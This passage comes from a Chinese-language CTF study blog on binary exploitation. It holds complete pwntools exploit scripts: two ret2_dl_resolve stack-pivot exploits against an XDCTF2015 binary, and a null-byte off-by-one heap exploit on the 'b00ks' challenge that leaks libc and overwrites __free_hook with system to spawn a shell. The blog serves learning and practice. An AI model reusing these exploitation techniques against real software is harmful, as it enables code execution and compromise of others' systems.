<p>plt_0 = elf.get_section_by_name(‘.plt’).header.sh_addr</p>
<p>rel_plt = elf.get_section_by_name(‘.rel.plt’).header.sh_addr</p>
<p>dynsym = elf.get_section_by_name(‘.dynsym’).header.sh_addr</p>
<p>dynstr = elf.get_section_by_name(‘.dynstr’).header.sh_addr</p>
<p>bss_addr = elf.get_section_by_name(‘.bss’).header.sh_addr</p>
<p>io = process(‘./200’)</p>
<p>base_addr = bss_addr  + 0x550</p>
<p>payload_1 = “A” * 112</p>
<p>payload_1 += p32(read_plt)</p>
<p>payload_1 += p32(pppr_addr)</p>
<p>payload_1 += p32(0)</p>
<p>payload_1 += p32(base_addr)</p>
<p>payload_1 += p32(100)</p>
<p>payload_1 += p32(pop_ebp_addr)</p>
<p>payload_1 += p32(base_addr)</p>
<p>payload_1 += p32(leave_ret_addr)</p>
<p>io.send(payload_1)        #转移栈到bss 可读可写可执行。</p>
<p>reloc_index = base_addr + 28 - rel_plt     #28为偏移 随意填</p>
<p>fake_sym_addr = base_addr + 36             # 36为偏移，随意填</p>
<p>align = 0x10 - ((fake_sym_addr - dynsym) &amp; 0xf)     #因为符号表每项的大小正好是 16字节，</p>
<p>fake_sym_addr = fake_sym_addr + align           # 伪造的地址应该也和16字节对齐</p>
<p>r_sym = (fake_sym_addr - dynsym) / 0x10      # 计算下标r_type = 0x7  # 对应函数 此值是固定的</p>
<p>r_type = 0x7</p>
<p>r_info = (r_sym &lt;&lt; 8) + (r_type &amp; 0xff)</p>
<p>fake_reloc = p32(write_got) + p32(r_info)    #此处借用read@got在存system地址</p>
<p>st_name = fake_sym_addr + 0x10 - dynstr      # system字符串存储的位置</p>
<p>st_bind = 0x1</p>
<p>st_type = 0x2</p>
<p>st_info = (st_bind &lt;&lt; 4) + (st_type &amp; 0xf)</p>
<p>fake_sym = p32(st_name) + p32(0) + p32(0) + p32(st_info)      #真正用到的是 st_name 和 st_info</p>
<p>payload_2 = “AAAA”</p>
<p>payload_2 += p32(plt_0)</p>
<p>payload_2 += p32(reloc_index)</p>
<p>payload_2 += “AAAA”   #return_addr</p>
<p>payload_2 += p32(base_addr + 80) #arg</p>
<p>payload_2 += “AAAA”</p>
<p>payload_2 += “AAAA”</p>
<p>payload_2 += fake_reloc</p>
<p>payload_2 += “A” * align</p>
<p>payload_2 += fake_sym</p>
<p>payload_2 += “system\x00”</p>
<p>payload_2 += “A” * (80 - len(payload_2))</p>
<p>payload_2 += “/bin/sh\x00”</p>
<p>payload_2 += “A” * (100 - len(payload_2))</p>
<p>#pdb.set_trace()</p>
<p>io.sendline(payload_2)</p>
<p>io.interactive()</p>
<p>exp :</p>
<p>from pwn import *<br>elf = ELF(‘./200’)<br>context.log_level = ‘debug’</p>
<p>offset = 112<br>read_plt = elf.plt[‘read’]<br>write_plt = elf.plt[‘write’]</p>
<p>ppp_ret = 0x080485cc # ROPgadget –binary bof –only “pop|ret”<br>pop_ebp_ret = 0x08048453<br>leave_ret = 0x08048481 # ROPgadget –binary bof –only “leave|ret”</p>
<p>stack_size = 0x800<br>bss_addr = 0x0804a020 # readelf -S bof | grep “.bss”<br>base_stage = bss_addr + stack_size</p>
<p>r = process(‘./200’)</p>
<p>r.recvuntil(‘Welcome to XDCTF2015~!\n’)</p>
<p>payload = flat(‘A’ * offset<br>, p32(read_plt)<br>, p32(ppp_ret)<br>, p32(0)<br>, p32(base_stage)<br>, p32(100)<br>, p32(pop_ebp_ret)<br>, p32(base_stage)<br>, p32(leave_ret))<br>r.sendline(payload)</p>
<p>cmd = “/bin/sh”<br>plt_0 = 0x080483c6 # objdump -d -j .plt bof<br>index_offset = 0x20# write’s index</p>
<p>payload2 = flat(‘AAAA’<br>, p32(plt_0) # push link_map;jmp dl_runtime_resolve<br>, index_offset # push 20h<br>, ‘aaaa’<br>, p32(1)<br>, p32(base_stage + 80)<br>, p32(len(cmd))<br>, ‘A’ * 52<br>, cmd + ‘\x00’<br>, ‘A’ * 12)</p>
<p>r.sendline(payload2)<br>r.interactive()</p>
<h2 id="堆溢出"><a href="#堆溢出" class="headerlink" title="堆溢出"></a>堆溢出</h2><h3 id="null-byte-off-by-one"><a href="#null-byte-off-by-one" class="headerlink" title="null byte off-by-one"></a>null byte off-by-one</h3><p>第一道堆题，</p>
<p>程序编写的 read 函数存在 null byte off-by-one 漏洞，仔细观察这个 read 函数可以发现对于边界的考虑是不当的。</p>
<p>signed __int64 __fastcall my_read(_BYTE *ptr, int number)<br>{<br>  int i; // [rsp+14h] [rbp-Ch]<br>  _BYTE *buf; // [rsp+18h] [rbp-8h]</p>
<p>  if ( number &lt;= 0 )<br>    return 0LL;<br>  buf = ptr;<br>  for ( i = 0; ; ++i )<br>  {<br>    if ( (unsigned int)read(0, buf, 1uLL) != 1 )<br>      return 1LL;<br>    if ( *buf == ‘\n’ )<br>      break;<br>    ++buf;<br>    if ( i == number )   (i从0开始，到size(从1开始)，会多出一个个数)<br>      break;<br>  }<br>  *buf = 0;<br>  return 0LL;<br>}</p>
<p>my_read 读入的结束符 ‘\x00’ 是写入到 0x555555756060 的位置的。这样当 0x555555756060～0x555555756068 写入 book 指针时就会覆盖掉结束符 ‘\x00’ ，<br>之后我们创建 book1 ，这个 book1 的指针会覆盖 author name 中最后的 NULL 字节，使得该指针与 author name 直接连接，这样输出 author name 则可以获取到一个堆指针。<br>创建的book1产生的堆的prev_size 即author name 创建的堆的地址<br>程序中同样提供了一种 change 功能， change 功能用于修改 author name ，所以通过 change 可以写入 author name ，利用 off-by-one 覆盖 book1 第一个项的低字节。<br>这个指针会指向 book1 的 description ，由于程序提供了 edit 功能可以任意修改 description 中的内容。<br>我们可以提前在 description 中布置数据伪造成一个 book 结构，这样就可以控制整个book结构，使其指向book2，将book1和book2链接起来。<br>利用off-by-one 泄露出book2的堆的地址，同时因为 可以申请一个很大的内存空间，使得程序利用mmap 来分配空间，mmap的地址和libc的地址相对偏移不变<br>所以得到book2的地址，就泄露出了libc的地址<br>伪造一个fake_book2_struct，其name指针为book2的name指针的地址（为addr_book1+56），然后利用打印功能来leak出book2的name指针的值，Libc泄露成功！！！<br>设置first_b00k_name内容为binsh，first_b00k_discription为free_hook,用second_b00k_discription向free_hook指向的内容写入system函数的地址。<br>当调用free函数的时候__free_hook函数不为NULL会优先调用__free_hook函数劫持free函数<br>执行system函数第一个free的参数可以设置为second_b00k_name。</p>
<p>exp :<br>from pwn import *<br>#context.log_level=”debug”<br>p=process(“./b00ks”)</p>
<p>def Create(name_size,name,discription_size,discription):<br>    p.sendline(‘1’)<br>    p.recvuntil(“size: “)<br>    p.sendline(name_size)<br>    p.recvuntil(“Enter book name (Max 32 chars): “)<br>    p.sendline(name)<br>    p.recvuntil(“Enter book description size: “)<br>    p.sendline(discription_size)<br>    p.recvuntil(“Enter book description: “)<br>    p.sendline(discription)</p>
<p>def Delete(ID):<br>    p.sendline(“2”)<br>    p.recvuntil(“Enter the book id you want to delete: “)<br>    p.sendline(ID)</p>
<p>def Edit(ID,discription):<br>    p.sendline(“3”)<br>    p.recvuntil(“Enter the book id you want to edit: “)<br>    p.sendline(ID)<br>    p.recvuntil(“Enter new book description: “)<br>    p.sendline(discription)</p>
<p>def Print():<br>    p.sendline(“4”)</p>
<p>def Change(author_name):<br>    p.sendline(“5”)<br>    p.recvuntil(“Enter author name: “)<br>    p.sendline(author_name)</p>
<p>#################################leak book1_addr###############################<br>p.recvuntil(“Enter author name: “)<br>p.sendline(“A”*31+”B”)<br>p.recvuntil(“&gt; “)<br>Create(“130”,”jion”,”32”,”i am join”) #######set fake b00k_addr<br>p.recvuntil(“&gt; “)<br>Print()<br>print p.recvuntil(“AB”)<br>first_b00k_addr=u64(p.recv(6)+’\00’+’\00’)<br>#gdb.attach(p)<br>print hex(first_b00k_addr)<br>####################################leak book1_addr end#######################</p>
<p>###################################set fake b00k in first b00k of discription###############<br>p.recvuntil(“&gt; “)<br>payload=p64(0x01)+p64(first_b00k_addr+0x38)*2+p64(0xffff)<br>Edit(‘1’,payload)<br>##############################make big memrry ####################################<br>p.recvuntil(“&gt; “)<br>Create(‘200000’,’bill’,’200000’,”this is bill”)<br>p.recvuntil(“&gt; “)<br>############################set first b00k to fake b00k############################</p>
<p>Change(“A”*30+’B’+’C’)<br>p.recvuntil(“&gt; “)<br>gdb.attach(p)</p>
<p>#############################get second b00k addr(get libc)#######################<br>Print()<br>p.recvuntil(“Name: “)<br>second_name_addr=u64(p.recv(6)+’\x00’+’\x00’)<br>print “second_name_addr=”+hex(second_name_addr)<br>#gdb.attach(p)<br>libc_base_addr=second_name_addr-0x5c2010<br>print “libc_base_addr=”+hex(libc_base_addr)<br>p.recvuntil(“&gt; “)<br>################################get libc addr end########################################<br>libc=ELF(‘libc.so.6’)<br>system_addr = libc.symbols[‘system’] + libc_base_addr<br>print “system_addr=”+hex(system_addr)<br>free_hook=libc.symbols[“__free_hook”]+libc_base_addr<br>binsh_addr = libc.search(‘/bin/sh’).next() + libc_base_addr<br>#gdb.attach(p)<br>####################################get shell#########################################<br>payload = p64(binsh_addr) + p64(free_hook)  #second_b00k_name=bin_sh    second_b00k_discription=free_hook<br>Edit(‘1’,payload)<br>payload=p64(system_addr)   #free_hook–&gt;system_addr<br>Edit(‘2’,payload)<br>Delete(‘2’)<br>p.interactive()</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">John Doe</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2020/11/28/pwn-%E5%AD%A6%E4%B9%A0/">http://example.com/2020/11/28/pwn-%E5%AD%A6%E4%B9%A0/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="next-post pull-full"><a href="/2020/11/28/re-%E5%AD%A6%E4%B9%A0/"><img class="next-cover" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">re 学习</div></div></a></div></nav></div><div class="aside_content" id="aside_content"><div class="card-widget card-info"><div class="card-content"><div class="card-info-avatar is-center"><img class="avatar-img" src="/null" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/><div class="author-info__name">John Doe</div><div class="author-info__description"></div></div><div class="card-info-data"><div class="card-info-data-item is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">4</div></a></div></div><a class="button--animated" id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div></div><div class="card-widget card-announcement"><div class="card-content"><div class="item-headline"><i class="fas fa-bullhorn card-announcement-animation"></i><span>Announcement</span></div><div class="announcement_content">This is my Blog</div></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="card-content"><div class="item-headline"><i class="fas fa-stream"></i><span>Catalog</span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C"><span class="toc-number">1.</span> <span class="toc-text">攻防世界</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#when-did-you-born"><span class="toc-number">1.1.</span> <span class="toc-text">when_did_you_born</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hello-pwn"><span class="toc-number">1.2.</span> <span class="toc-text">hello_pwn</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#level0"><span class="toc-number">1.3.</span> <span class="toc-text">level0</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#level2"><span class="toc-number">1.4.</span> <span class="toc-text">level2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CGfsb"><span class="toc-number">1.5.</span> <span class="toc-text">CGfsb</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dice-game"><span class="toc-number">1.6.</span> <span class="toc-text">dice_game</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mary-morton"><span class="toc-number">1.7.</span> <span class="toc-text">mary_morton</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#string"><span class="toc-number">1.8.</span> <span class="toc-text">string</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Buuctf"><span class="toc-number">2.</span> <span class="toc-text">Buuctf</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#rip"><span class="toc-number">2.1.</span> <span class="toc-text">rip</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#pwn1-sctf-2016"><span class="toc-number">2.2.</span> <span class="toc-text">pwn1_sctf_2016</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ciscn-2019-n-1"><span class="toc-number">2.3.</span> <span class="toc-text">ciscn_2019_n_1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#get-started-3dsctf-2016"><span class="toc-number">2.4.</span> <span class="toc-text">get_started_3dsctf_2016</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Hgame"><span class="toc-number">3.</span> <span class="toc-text">Hgame</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#whitegive"><span class="toc-number">3.1.</span> <span class="toc-text">whitegive</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.</span> <span class="toc-text">格式化字符串漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Canary%E6%A0%88%E4%BF%9D%E6%8A%A4"><span class="toc-number">5.</span> <span class="toc-text">Canary栈保护</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#babystack"><span class="toc-number">5.1.</span> <span class="toc-text">babystack</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mprotect-%E5%87%BD%E6%95%B0"><span class="toc-number">6.</span> <span class="toc-text">mprotect  函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Rop"><span class="toc-number">7.</span> <span class="toc-text">Rop</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E6%AD%A5%E4%B8%80%E6%AD%A5-ROP-level2"><span class="toc-number">7.1.</span> <span class="toc-text">一步一步 ROP level2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E6%AD%A5%E4%B8%80%E6%AD%A5-ROP-level5"><span class="toc-number">7.2.</span> <span class="toc-text">一步一步 ROP level5</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ret2-dl-resolve"><span class="toc-number">7.3.</span> <span class="toc-text">ret2_dl_resolve</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A0%86%E6%BA%A2%E5%87%BA"><span class="toc-number">8.</span> <span class="toc-text">堆溢出</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#null-byte-off-by-one"><span class="toc-number">8.1.</span> <span class="toc-text">null byte off-by-one</span></a></li></ol></li></ol></div></div></div><div class="card-widget card-recent-post"><div class="card-content"><div class="item-headline"><i class="fas fa-history"></i><span>Recent Post</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2020/11/28/pwn-%E5%AD%A6%E4%B9%A0/" title="pwn 学习"><img src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="pwn 学习"/></a><div class="content"><a class="title" href="/2020/11/28/pwn-%E5%AD%A6%E4%B9%A0/" title="pwn 学习">pwn 学习</a><time datetime="2020-11-28T08:53:32.000Z" title="Created 2020-11-28 16:53:32">2020-11-28</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2020/11/28/re-%E5%AD%A6%E4%B9%A0/" title="re 学习"><img src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="re 学习"/></a><div class="content"><a class="title" href="/2020/11/28/re-%E5%AD%A6%E4%B9%A0/" title="re 学习">re 学习</a><time datetime="2020-11-28T08:53:09.000Z" title="Created 2020-11-28 16:53:09">2020-11-28</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2020/11/28/%E5%AD%A6%E4%B9%A0%E6%8A%A5%E5%91%8A/" title="学习报告"><img src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="学习报告"/></a><div class="content"><a class="title" href="/2020/11/28/%E5%AD%A6%E4%B9%A0%E6%8A%A5%E5%91%8A/" title="学习报告">学习报告</a><time datetime="2020-11-28T08:51:56.000Z" title="Created 2020-11-28 16:51:56">2020-11-28</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2020/11/22/hello-world/" title="Hello World"><img src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Hello World"/></a><div class="content"><a class="title" href="/2020/11/22/hello-world/" title="Hello World">Hello World</a><time datetime="2020-11-22T12:46:09.312Z" title="Created 2020-11-22 20:46:09">2020-11-22</time></div></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2021 By John Doe</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></div></body></html>